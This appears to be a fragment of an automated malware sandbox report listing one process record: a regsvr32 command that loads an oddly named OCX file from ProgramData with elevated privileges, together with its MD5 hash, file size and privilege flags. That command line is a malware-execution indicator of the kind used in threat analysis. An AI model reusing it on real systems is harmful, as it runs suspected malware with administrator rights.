                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:regsvr32 -e -n -i:&Tiposa!G22& C:\ProgramData\Volet6.ocx
                                                                                                                                              Imagebase:0x1f0000
                                                                                                                                              File size:20992 bytes
                                                                                                                                              MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Reputation:high

                                                                                                                                              Disassembly

                                                                                                                                              Code Analysis

                                                                                                                                              Reset < >